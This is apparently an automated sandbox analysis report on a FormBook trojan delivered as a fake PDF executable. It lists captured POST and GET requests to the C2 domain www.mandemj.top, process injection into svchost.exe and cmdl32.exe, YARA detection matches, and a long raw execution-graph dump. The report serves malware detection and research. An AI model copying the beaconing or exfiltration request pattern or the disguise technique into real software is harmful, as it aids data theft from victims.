                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            19 | 192.168.2.7 | 49724 | 162.0.238.43 | 80 | 6908 | C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Sep 26, 2024 15:26:01.336790085 CEST | 1647 | OUT | POST /to69/ HTTP/1.1
                            Host: www.mandemj.top
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Accept-Encoding: gzip, deflate, br
                            Origin: http://www.mandemj.top
                            Content-Length: 1247
                            Cache-Control: no-cache
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            Referer: http://www.mandemj.top/to69/
                            User-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
                            Data Raw: 5a 30 3d 75 6c 5a 37 4c 52 56 55 75 36 4b 35 35 56 73 59 58 39 2f 57 56 78 55 35 4e 7a 6f 4f 74 73 5a 55 5a 79 6f 6d 78 62 6b 31 52 63 76 54 67 71 57 58 6a 41 51 6e 75 30 71 54 77 35 62 4d 42 56 4f 41 62 76 63 4f 35 78 78 78 54 6d 45 54 4c 76 50 6c 47 32 7a 5a 57 62 6c 68 69 63 2b 34 6e 31 6d 68 36 6c 42 52 43 33 74 50 37 6b 61 65 51 6b 34 34 6b 71 56 44 67 76 4f 70 42 6b 5a 71 30 4e 62 57 4b 2f 7a 35 63 63 57 2b 74 66 59 37 50 74 5a 67 53 73 6b 42 69 53 4d 33 47 39 64 6e 71 53 2f 6d 66 50 54 52 50 75 7a 47 78 6f 2f 38 4a 7a 33 2f 59 52 69 37 75 66 66 64 6a 2b 36 67 42 56 37 73 6d 4e 6a 59 4f 2f 72 38 4a 34 6b 33 78 73 77 49 34 34 49 57 45 4d 50 64 6e 67 52 52 2f 4e 46 73 32 6f 4a 59 6a 5a 64 35 63 63 71 6f 4f 70 70 72 53 76 65 7a 67 54 6d 39 61 33 76 32 35 63 36 43 6e 6b 50 52 42 45 31 33 73 58 5a 4a 6f 77 75 54 47 4e 61 53 52 43 45 38 57 4c 32 2b 76 59 48 50 50 6b 73 4c 6b 78 44 6c 65 77 42 79 77 4d 6e 59 42 32 70 2f 44 66 74 53 2b 7a 58 6f 43 47 44 4e 36 68 38 4b 66 78 52 59 2b 57 52 35 55 33 34 [TRUNCATED]
                            Data Ascii: Z0= [TRUNCATED]
                            Sep 26, 2024 15:26:01.993768930 CEST | 533 | IN | HTTP/1.1 404 Not Found
                            Date: Thu, 26 Sep 2024 13:26:01 GMT
                            Server: Apache
                            Content-Length: 389
                            Connection: close
                            Content-Type: text/html
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                            20 | 192.168.2.7 | 49725 | 162.0.238.43 | 80 | 6908 | C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe
                            Timestamp | Bytes transferred | Direction | Data
                            Sep 26, 2024 15:26:04.526388884 CEST | 352 | OUT | GET /to69/?Z0=jnxbIh9toY3Lk084faTvVBMEFxwUktgIZy5Q1YpSMvmzprTTtz9cwA3B/bTtN1ehZaJt7UsIXSNTUbHOXFDXB9gkhdqEj3u6wGNYEX9l8USgN38burlDvemyCHtOx57idtfraeuBs8os&fRr0=tfAptZ HTTP/1.1
                            Host: www.mandemj.top
                            Accept: */*
                            Accept-Language: en-US,en;q=0.9
                            Connection: close
                            User-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)
                            Sep 26, 2024 15:26:05.119072914 CEST | 548 | IN | HTTP/1.1 404 Not Found
                            Date: Thu, 26 Sep 2024 13:26:05 GMT
                            Server: Apache
                            Content-Length: 389
                            Connection: close
                            Content-Type: text/html; charset=utf-8
                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>



                            Target ID:6
                            Start time:09:22:58
                            Start date:26/09/2024
                            Path:C:\Users\user\Desktop\Product Data Specifications_PDF.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\Product Data Specifications_PDF.exe"
                            Imagebase:0x400000
                            File size:1'335'877 bytes
                            MD5 hash:94CC1457803DF28F1D4C7A39DB96E956
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low
                            Has exited:true

                            Target ID:9
                            Start time:09:23:09
                            Start date:26/09/2024
                            Path:C:\Windows\SysWOW64\svchost.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\Product Data Specifications_PDF.exe"
                            Imagebase:0xc20000
                            File size:46'504 bytes
                            MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1764340850.0000000003520000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.1764340850.0000000003520000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1764028622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.1764028622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1764711374.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.1764711374.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                            Reputation:high
                            Has exited:true

                            Target ID:11
                            Start time:11:18:55
                            Start date:26/09/2024
                            Path:C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe"
                            Imagebase:0xc20000
                            File size:140'800 bytes
                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3158420814.0000000003120000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.3158420814.0000000003120000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                            Reputation:high
                            Has exited:false

                            Target ID:12
                            Start time:11:18:57
                            Start date:26/09/2024
                            Path:C:\Windows\SysWOW64\cmdl32.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\SysWOW64\cmdl32.exe"
                            Imagebase:0x6c0000
                            File size:46'592 bytes
                            MD5 hash:BD60DF43E6419AFE39B3FCBFB14077E7
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3153614181.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.3153614181.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3158487172.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.3158487172.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3150227447.0000000002B90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000C.00000002.3150227447.0000000002B90000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                            Reputation:moderate
                            Has exited:false

                            Target ID:13
                            Start time:11:19:11
                            Start date:26/09/2024
                            Path:C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Program Files (x86)\NnIoZryBhEWtMulIQJDewMaljOmMStycHIiupvVKLGbAhpXXsqIzIaMRFWDavEHdVRuOhfVVZInD\EyHLOQmzGKBL.exe"
                            Imagebase:0xc20000
                            File size:140'800 bytes
                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.3155322481.0000000000740000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000D.00000002.3155322481.0000000000740000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                            Reputation:high
                            Has exited:false

                            Target ID:17
                            Start time:11:19:24
                            Start date:26/09/2024
                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                            Imagebase:0x7ff722870000
                            File size:676'768 bytes
                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true


                              Execution Graph

                              Execution Coverage:3.6%
                              Dynamic/Decrypted Code Coverage:0.4%
                              Signature Coverage:9.5%
                              Total number of Nodes:2000
                              Total number of Limit Nodes:35
                              execution_graph: node and edge data backing the rendered Execution Graph (2000 nodes, 35 limit nodes); raw graph data, not reproduced as text
40c321 87185->87189 87190 426c5a 87185->87190 87192 426c4b 87186->87192 87193 426c2e 87186->87193 87887 403ea0 52 API calls __cinit 87187->87887 87892 4534e3 52 API calls 87188->87892 87888 403ea0 52 API calls __cinit 87189->87888 87891 4534e3 52 API calls 87190->87891 87890 4534e3 52 API calls 87192->87890 87199 40c2de 87193->87199 87889 4534e3 52 API calls 87193->87889 87199->86981 87199->87199 87201 401a30 87200->87201 87202 401a17 87200->87202 87204 402160 52 API calls 87201->87204 87203 401a2d 87202->87203 87893 403c30 52 API calls _memmove 87202->87893 87203->86985 87206 401a3d 87204->87206 87206->86985 87208 411523 87207->87208 87209 4114ba 87207->87209 87896 4113a8 58 API calls 3 library calls 87208->87896 87214 40200c 87209->87214 87894 417f77 46 API calls __getptd_noexit 87209->87894 87212 4114c6 87895 417f25 10 API calls __wsplitpath_helper 87212->87895 87214->86988 87214->86989 87215->87017 87216->87019 87217->87024 87218->87024 87220 4026f0 52 API calls 87219->87220 87221 401c97 87220->87221 87221->87148 87222->87158 87223->87157 87284 40f6f0 87224->87284 87226 40f77b _strcat moneypunct 87292 40f850 87226->87292 87231 427c2a 87321 414d04 87231->87321 87233 40f7fc 87233->87231 87234 40f804 87233->87234 87308 414a46 87234->87308 87239 40f80e 87239->87162 87243 4528bd 87239->87243 87240 427c59 87327 414fe2 87240->87327 87242 427c79 87244 4150d1 _fseek 81 API calls 87243->87244 87245 452930 87244->87245 87827 452719 87245->87827 87248 452948 87248->87164 87249 414d04 __fread_nolock 61 API calls 87250 452966 87249->87250 87251 414d04 __fread_nolock 61 API calls 87250->87251 87252 452976 87251->87252 87253 414d04 __fread_nolock 61 API calls 87252->87253 87254 45298f 87253->87254 87255 414d04 __fread_nolock 61 API calls 87254->87255 87256 4529aa 87255->87256 87257 4150d1 _fseek 81 API calls 87256->87257 87258 4529c4 87257->87258 87259 4135bb _malloc 46 API calls 87258->87259 87260 4529cf 87259->87260 87261 4135bb _malloc 46 API calls 87260->87261 87262 4529db 
87261->87262 87263 414d04 __fread_nolock 61 API calls 87262->87263 87264 4529ec 87263->87264 87265 44afef GetSystemTimeAsFileTime 87264->87265 87266 452a00 87265->87266 87267 452a36 87266->87267 87268 452a13 87266->87268 87270 452aa5 87267->87270 87271 452a3c 87267->87271 87269 413748 _free 46 API calls 87268->87269 87273 452a1c 87269->87273 87272 413748 _free 46 API calls 87270->87272 87833 44b1a9 87271->87833 87279 452aa3 87272->87279 87275 413748 _free 46 API calls 87273->87275 87277 452a25 87275->87277 87276 452a9d 87278 413748 _free 46 API calls 87276->87278 87277->87164 87278->87279 87279->87164 87281 431e64 87280->87281 87283 431e6a 87280->87283 87282 414a46 __fcloseall 82 API calls 87281->87282 87282->87283 87283->87165 87285 425de2 87284->87285 87286 40f6fc _wcslen 87284->87286 87285->87226 87287 40f710 WideCharToMultiByte 87286->87287 87288 40f756 87287->87288 87289 40f728 87287->87289 87288->87226 87290 4115d7 52 API calls 87289->87290 87291 40f735 WideCharToMultiByte 87290->87291 87291->87226 87294 40f85d _memcpy_s _strlen 87292->87294 87295 40f7ab 87294->87295 87340 414db8 87294->87340 87296 4149c2 87295->87296 87355 414904 87296->87355 87298 40f7e9 87298->87231 87299 40f5c0 87298->87299 87304 40f5cd _strcat __write_nolock _memmove 87299->87304 87300 414d04 __fread_nolock 61 API calls 87300->87304 87302 425d11 87303 4150d1 _fseek 81 API calls 87302->87303 87305 425d33 87303->87305 87304->87300 87304->87302 87307 40f691 __tzset_nolock 87304->87307 87443 4150d1 87304->87443 87306 414d04 __fread_nolock 61 API calls 87305->87306 87306->87307 87307->87233 87309 414a52 __tsopen_nolock 87308->87309 87310 414a64 87309->87310 87311 414a79 87309->87311 87583 417f77 46 API calls __getptd_noexit 87310->87583 87313 415471 __lock_file 47 API calls 87311->87313 87317 414a74 __tsopen_nolock 87311->87317 87315 414a92 87313->87315 87314 414a69 87584 417f25 10 API calls __wsplitpath_helper 87314->87584 87567 4149d9 87315->87567 87317->87239 87652 414c76 87321->87652 
87323 414d1c 87324 44afef 87323->87324 87820 442c5a 87324->87820 87326 44b00d 87326->87240 87328 414fee __tsopen_nolock 87327->87328 87329 414ffa 87328->87329 87330 41500f 87328->87330 87824 417f77 46 API calls __getptd_noexit 87329->87824 87332 415471 __lock_file 47 API calls 87330->87332 87334 415017 87332->87334 87333 414fff 87825 417f25 10 API calls __wsplitpath_helper 87333->87825 87336 414e4e __ftell_nolock 51 API calls 87334->87336 87338 415024 87336->87338 87337 41500a __tsopen_nolock 87337->87242 87826 41503d LeaveCriticalSection LeaveCriticalSection __wfsopen 87338->87826 87341 414dd6 87340->87341 87342 414deb 87340->87342 87351 417f77 46 API calls __getptd_noexit 87341->87351 87342->87341 87344 414df2 87342->87344 87353 41b91b 79 API calls 12 library calls 87344->87353 87345 414ddb 87352 417f25 10 API calls __wsplitpath_helper 87345->87352 87348 414e18 87349 414de6 87348->87349 87354 418f98 77 API calls 6 library calls 87348->87354 87349->87294 87351->87345 87352->87349 87353->87348 87354->87349 87357 414910 __tsopen_nolock 87355->87357 87356 414923 87411 417f77 46 API calls __getptd_noexit 87356->87411 87357->87356 87360 414951 87357->87360 87359 414928 87412 417f25 10 API calls __wsplitpath_helper 87359->87412 87374 41d4d1 87360->87374 87363 414956 87364 41496a 87363->87364 87365 41495d 87363->87365 87367 414992 87364->87367 87368 414972 87364->87368 87413 417f77 46 API calls __getptd_noexit 87365->87413 87391 41d218 87367->87391 87414 417f77 46 API calls __getptd_noexit 87368->87414 87370 414933 __tsopen_nolock @_EH4_CallFilterFunc@8 87370->87298 87375 41d4dd __tsopen_nolock 87374->87375 87376 4182cb __lock 46 API calls 87375->87376 87389 41d4eb 87376->87389 87377 41d560 87416 41d5fb 87377->87416 87378 41d567 87380 416b04 __malloc_crt 46 API calls 87378->87380 87381 41d56e 87380->87381 87381->87377 87383 41d57c InitializeCriticalSectionAndSpinCount 87381->87383 87382 41d5f0 __tsopen_nolock 87382->87363 87384 41d59c 87383->87384 87385 41d5af 
EnterCriticalSection 87383->87385 87388 413748 _free 46 API calls 87384->87388 87385->87377 87386 418209 __mtinitlocknum 46 API calls 87386->87389 87388->87377 87389->87377 87389->87378 87389->87386 87419 4154b2 47 API calls __lock 87389->87419 87420 415520 LeaveCriticalSection LeaveCriticalSection _doexit 87389->87420 87392 41d23a 87391->87392 87393 41d255 87392->87393 87403 41d26c __wopenfile 87392->87403 87425 417f77 46 API calls __getptd_noexit 87393->87425 87395 41d25a 87426 417f25 10 API calls __wsplitpath_helper 87395->87426 87396 41d47a 87430 417f77 46 API calls __getptd_noexit 87396->87430 87397 41d48c 87422 422bf9 87397->87422 87401 41d47f 87431 417f25 10 API calls __wsplitpath_helper 87401->87431 87402 41499d 87415 4149b8 LeaveCriticalSection LeaveCriticalSection __wfsopen 87402->87415 87403->87396 87410 41d421 87403->87410 87427 41341f 58 API calls 2 library calls 87403->87427 87406 41d41a 87406->87410 87428 41341f 58 API calls 2 library calls 87406->87428 87408 41d439 87408->87410 87429 41341f 58 API calls 2 library calls 87408->87429 87410->87396 87410->87397 87411->87359 87412->87370 87413->87370 87414->87370 87415->87370 87421 4181f2 LeaveCriticalSection 87416->87421 87418 41d602 87418->87382 87419->87389 87420->87389 87421->87418 87432 422b35 87422->87432 87424 422c14 87424->87402 87425->87395 87426->87402 87427->87406 87428->87408 87429->87410 87430->87401 87431->87402 87435 422b41 __tsopen_nolock 87432->87435 87433 422b54 87434 417f77 __wsplitpath_helper 46 API calls 87433->87434 87437 422b59 87434->87437 87435->87433 87436 422b8a 87435->87436 87438 422400 __tsopen_nolock 109 API calls 87436->87438 87439 417f25 __wsplitpath_helper 10 API calls 87437->87439 87440 422ba4 87438->87440 87442 422b63 __tsopen_nolock 87439->87442 87441 422bcb __wsopen_helper LeaveCriticalSection 87440->87441 87441->87442 87442->87424 87444 4150dd __tsopen_nolock 87443->87444 87445 4150e9 87444->87445 87447 41510f 87444->87447 87474 417f77 46 API calls __getptd_noexit 
87445->87474 87456 415471 87447->87456 87448 4150ee 87475 417f25 10 API calls __wsplitpath_helper 87448->87475 87455 4150f9 __tsopen_nolock 87455->87304 87457 415483 87456->87457 87458 4154a5 EnterCriticalSection 87456->87458 87457->87458 87459 41548b 87457->87459 87460 415117 87458->87460 87461 4182cb __lock 46 API calls 87459->87461 87462 415047 87460->87462 87461->87460 87463 415067 87462->87463 87464 415057 87462->87464 87469 415079 87463->87469 87477 414e4e 87463->87477 87532 417f77 46 API calls __getptd_noexit 87464->87532 87468 41505c 87476 415143 LeaveCriticalSection LeaveCriticalSection __wfsopen 87468->87476 87494 41443c 87469->87494 87472 4150b9 87507 41e1f4 87472->87507 87474->87448 87475->87455 87476->87455 87478 414e61 87477->87478 87479 414e79 87477->87479 87533 417f77 46 API calls __getptd_noexit 87478->87533 87480 414139 __fflush_nolock 46 API calls 87479->87480 87482 414e80 87480->87482 87485 41e1f4 __write 51 API calls 87482->87485 87483 414e66 87534 417f25 10 API calls __wsplitpath_helper 87483->87534 87486 414e97 87485->87486 87487 414f09 87486->87487 87489 414ec9 87486->87489 87493 414e71 87486->87493 87535 417f77 46 API calls __getptd_noexit 87487->87535 87490 41e1f4 __write 51 API calls 87489->87490 87489->87493 87491 414f64 87490->87491 87492 41e1f4 __write 51 API calls 87491->87492 87491->87493 87492->87493 87493->87469 87495 414455 87494->87495 87496 414477 87494->87496 87495->87496 87497 414139 __fflush_nolock 46 API calls 87495->87497 87500 414139 87496->87500 87498 414470 87497->87498 87536 41b7b2 77 API calls 6 library calls 87498->87536 87501 414145 87500->87501 87502 41415a 87500->87502 87537 417f77 46 API calls __getptd_noexit 87501->87537 87502->87472 87504 41414a 87538 417f25 10 API calls __wsplitpath_helper 87504->87538 87506 414155 87506->87472 87508 41e200 __tsopen_nolock 87507->87508 87509 41e208 87508->87509 87511 41e223 87508->87511 87559 417f8a 46 API calls __getptd_noexit 87509->87559 87512 41e22f 87511->87512 87515 
41e269 87511->87515 87561 417f8a 46 API calls __getptd_noexit 87512->87561 87513 41e20d 87560 417f77 46 API calls __getptd_noexit 87513->87560 87539 41ae56 87515->87539 87517 41e234 87562 417f77 46 API calls __getptd_noexit 87517->87562 87520 41e23c 87563 417f25 10 API calls __wsplitpath_helper 87520->87563 87521 41e26f 87523 41e291 87521->87523 87524 41e27d 87521->87524 87564 417f77 46 API calls __getptd_noexit 87523->87564 87549 41e17f 87524->87549 87525 41e215 __tsopen_nolock 87525->87468 87528 41e289 87566 41e2c0 LeaveCriticalSection __unlock_fhandle 87528->87566 87529 41e296 87565 417f8a 46 API calls __getptd_noexit 87529->87565 87532->87468 87533->87483 87534->87493 87535->87493 87536->87496 87537->87504 87538->87506 87540 41ae62 __tsopen_nolock 87539->87540 87541 41aebc 87540->87541 87542 4182cb __lock 46 API calls 87540->87542 87543 41aec1 EnterCriticalSection 87541->87543 87544 41aede __tsopen_nolock 87541->87544 87545 41ae8e 87542->87545 87543->87544 87544->87521 87546 41aeaa 87545->87546 87547 41ae97 InitializeCriticalSectionAndSpinCount 87545->87547 87548 41aeec ___lock_fhandle LeaveCriticalSection 87546->87548 87547->87546 87548->87541 87550 41aded __lseeki64_nolock 46 API calls 87549->87550 87551 41e18e 87550->87551 87552 41e1a4 SetFilePointer 87551->87552 87553 41e194 87551->87553 87554 41e1c3 87552->87554 87555 41e1bb GetLastError 87552->87555 87556 417f77 __wsplitpath_helper 46 API calls 87553->87556 87557 41e199 87554->87557 87558 417f9d __dosmaperr 46 API calls 87554->87558 87555->87554 87556->87557 87557->87528 87558->87557 87559->87513 87560->87525 87561->87517 87562->87520 87563->87525 87564->87529 87565->87528 87566->87525 87568 4149ea 87567->87568 87569 4149fe 87567->87569 87613 417f77 46 API calls __getptd_noexit 87568->87613 87571 4149fa 87569->87571 87573 41443c __flush 77 API calls 87569->87573 87585 414ab2 LeaveCriticalSection LeaveCriticalSection __wfsopen 87571->87585 87572 4149ef 87614 417f25 10 API calls __wsplitpath_helper 
87572->87614 87575 414a0a 87573->87575 87586 41d8c2 87575->87586 87578 414139 __fflush_nolock 46 API calls 87579 414a18 87578->87579 87590 41d7fe 87579->87590 87581 414a1e 87581->87571 87582 413748 _free 46 API calls 87581->87582 87582->87571 87583->87314 87584->87317 87585->87317 87587 414a12 87586->87587 87588 41d8d2 87586->87588 87587->87578 87588->87587 87589 413748 _free 46 API calls 87588->87589 87589->87587 87591 41d80a __tsopen_nolock 87590->87591 87592 41d812 87591->87592 87596 41d82d 87591->87596 87630 417f8a 46 API calls __getptd_noexit 87592->87630 87594 41d839 87632 417f8a 46 API calls __getptd_noexit 87594->87632 87595 41d817 87631 417f77 46 API calls __getptd_noexit 87595->87631 87596->87594 87598 41d873 87596->87598 87601 41ae56 ___lock_fhandle 48 API calls 87598->87601 87600 41d83e 87633 417f77 46 API calls __getptd_noexit 87600->87633 87603 41d879 87601->87603 87606 41d893 87603->87606 87607 41d887 87603->87607 87604 41d846 87634 417f25 10 API calls __wsplitpath_helper 87604->87634 87635 417f77 46 API calls __getptd_noexit 87606->87635 87615 41d762 87607->87615 87608 41d81f __tsopen_nolock 87608->87581 87611 41d88d 87636 41d8ba LeaveCriticalSection __unlock_fhandle 87611->87636 87613->87572 87614->87571 87637 41aded 87615->87637 87617 41d772 87618 41d7c8 87617->87618 87619 41d7a6 87617->87619 87621 41aded __lseeki64_nolock 46 API calls 87617->87621 87650 41ad67 47 API calls 2 library calls 87618->87650 87619->87618 87622 41aded __lseeki64_nolock 46 API calls 87619->87622 87624 41d79d 87621->87624 87625 41d7b2 CloseHandle 87622->87625 87623 41d7d0 87626 41d7f2 87623->87626 87651 417f9d 46 API calls 3 library calls 87623->87651 87628 41aded __lseeki64_nolock 46 API calls 87624->87628 87625->87618 87629 41d7be GetLastError 87625->87629 87626->87611 87628->87619 87629->87618 87630->87595 87631->87608 87632->87600 87633->87604 87634->87608 87635->87611 87636->87608 87638 41ae12 87637->87638 87639 41adfa 87637->87639 87642 417f8a __read_nolock 46 API 
